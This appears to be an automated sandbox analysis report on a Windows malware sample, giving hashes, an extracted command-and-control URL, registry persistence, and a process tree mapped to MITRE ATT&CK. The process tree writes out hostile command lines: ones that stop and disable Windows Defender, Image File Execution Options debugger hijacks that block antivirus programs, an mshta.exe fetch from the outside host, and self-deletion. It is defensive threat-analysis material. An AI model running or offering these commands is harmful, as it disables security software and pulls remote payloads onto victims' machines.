Analysis
max time kernel: 150s
max time network: 97s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
submitted: 25/09/2024, 09:23

Static task: static1
Behavioral task: behavioral1
  Sample: f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
  Resource: win7-20240903-en
Behavioral task: behavioral2
  Sample: f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General
Target: f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Size: 2.5MB
MD5: f5b25ec260db4901e88d2793b5e34998
SHA1: 05e5794bffc36694bb39750652fd84dc7e3146e6
SHA256: 6edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
SHA512: 5b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec
SSDEEP: 49152:8nEdi2AHYTFxTal3sQ7VoqvZgpIgpilI3gXWs0SoyN+Y+RC5Hwen/aGLYAzpkbyh:z44pxTal3sQ5raXS1c2Fv/ZLYAzpXh
Malware Config
Extracted URL: http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=UXMRPRRI&2=i-s&3=176&4=9200&5=6&6=2&7=919041&8=1033
Signatures

Modifies WinLogon for persistence (2 TTPs, 1 IoC)
  description | ioc | Process
  Set value (str) | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\dysfrs.exe" | dysfrs.exe
Event Triggered Execution: Image File Execution Options Injection (1 TTP, 16 IoCs)
  description | ioc | Process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe" | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe" | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe" | dysfrs.exe
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe" | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe" | dysfrs.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe" | dysfrs.exe
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence.
  description | ioc | Process
  Key value queried | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Control Panel\International\Geo\Nation | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
Executes dropped EXE (1 IoC)
  pid | Process
  1300 | dysfrs.exe
Indicator Removal: File Deletion (1 TTP)
Adversaries may delete files left behind by the actions of their intrusion activity.
Launches sc.exe (6 IoCs)
sc.exe is a Windows utility to control services on the system.
  pid | Process
  4276 | sc.exe
  2444 | sc.exe
  2928 | sc.exe
  4980 | sc.exe
  3476 | sc.exe
  1140 | sc.exe
Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery (1 TTP, 14 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | Process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | dysfrs.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | mshta.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net1.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | net.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sc.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  pid | Process
  1300 | dysfrs.exe (64 identical entries)
Suspicious use of AdjustPrivilegeToken (4 IoCs)
  description | pid | Process
  Token: SeDebugPrivilege | 1300 | dysfrs.exe
  Token: SeShutdownPrivilege | 1300 | dysfrs.exe
  Token: SeDebugPrivilege | 1300 | dysfrs.exe
  Token: SeShutdownPrivilege | 1300 | dysfrs.exe
Suspicious use of FindShellTrayWindow (4 IoCs)
  pid | Process
  1300 | dysfrs.exe (4 identical entries)
Suspicious use of SetWindowsHookEx (2 IoCs)
  pid | Process
  1300 | dysfrs.exe (2 identical entries)
Suspicious use of WriteProcessMemory (39 IoCs; each row below appears three times in the report)
  description | pid | Process | procid_target
  PID 924 wrote to memory of 4276 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 82
  PID 924 wrote to memory of 2444 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 83
  PID 924 wrote to memory of 5028 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 84
  PID 924 wrote to memory of 2928 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 86
  PID 5028 wrote to memory of 4112 | 5028 | net.exe | 91
  PID 924 wrote to memory of 1300 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 90
  PID 924 wrote to memory of 5008 | 924 | f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe | 92
  PID 1300 wrote to memory of 4980 | 1300 | dysfrs.exe | 94
  PID 1300 wrote to memory of 1140 | 1300 | dysfrs.exe | 95
  PID 1300 wrote to memory of 5032 | 1300 | dysfrs.exe | 96
  PID 1300 wrote to memory of 3476 | 1300 | dysfrs.exe | 97
  PID 5032 wrote to memory of 1416 | 5032 | net.exe | 102
  PID 1300 wrote to memory of 3232 | 1300 | dysfrs.exe | 103
Processes (indentation shows the parent/child tree)

C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe (PID 924)
  command line: "C:\Users\Admin\AppData\Local\Temp\f5b25ec260db4901e88d2793b5e34998_JaffaCakes118.exe"
  - Checks computer location settings
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\sc.exe (PID 4276)
    command line: sc stop WinDefend
    - Launches sc.exe
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\sc.exe (PID 2444)
    command line: sc config WinDefend start= disabled
    - Launches sc.exe
    - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\net.exe (PID 5028)
    command line: net stop msmpsvc
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\net1.exe (PID 4112)
      command line: C:\Windows\system32\net1 stop msmpsvc
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\sc.exe (PID 2928)
    command line: sc config msmpsvc start= disabled
    - Launches sc.exe
    - System Location Discovery: System Language Discovery

  C:\Users\Admin\AppData\Roaming\Microsoft\dysfrs.exe (PID 1300)
    command line: C:\Users\Admin\AppData\Roaming\Microsoft\dysfrs.exe
    - Modifies WinLogon for persistence
    - Event Triggered Execution: Image File Execution Options Injection
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\sc.exe (PID 4980)
      command line: sc stop WinDefend
      - Launches sc.exe
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\sc.exe (PID 1140)
      command line: sc config WinDefend start= disabled
      - Launches sc.exe
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\net.exe (PID 5032)
      command line: net stop msmpsvc
      - System Location Discovery: System Language Discovery
      - Suspicious use of WriteProcessMemory

      C:\Windows\SysWOW64\net1.exe (PID 1416)
        command line: C:\Windows\system32\net1 stop msmpsvc
        - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\sc.exe (PID 3476)
      command line: sc config msmpsvc start= disabled
      - Launches sc.exe
      - System Location Discovery: System Language Discovery

    C:\Windows\SysWOW64\mshta.exe (PID 3232)
      command line: mshta.exe "http://soft-store-inc.com/soft-usage/favicon.ico?0=1200&1=UXMRPRRI&2=i-s&3=176&4=9200&5=6&6=2&7=919041&8=1033"
      - System Location Discovery: System Language Discovery

  C:\Windows\SysWOW64\cmd.exe (PID 5008)
    command line: "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\F5B25E~1.EXE" >> NUL
    - System Location Discovery: System Language Discovery
Network
MITRE ATT&CK Enterprise v15 (count of matched signatures in parentheses)

Persistence
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)

Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Winlogon Helper DLL (1)
  Create or Modify System Process (2)
    Windows Service (2)
  Event Triggered Execution (1)
    Image File Execution Options Injection (1)

Defense Evasion
  Impair Defenses (1)
  Indicator Removal (1)
    File Deletion (1)
  Modify Registry (1)
Downloads
Filesize: 2.5MB
MD5: f5b25ec260db4901e88d2793b5e34998
SHA1: 05e5794bffc36694bb39750652fd84dc7e3146e6
SHA256: 6edffe88fcc7936cd27cb9016ca25739aabd148e40cb44eeff8c53975f3144af
SHA512: 5b6331493a142bbeb2c477a007c7275be20fbdc9af3413a508e84ceb8c2c4a6e34be30ce6dfddf2dbfd6cfd187e4a67823c687923f7d36a500c5f56baba04bec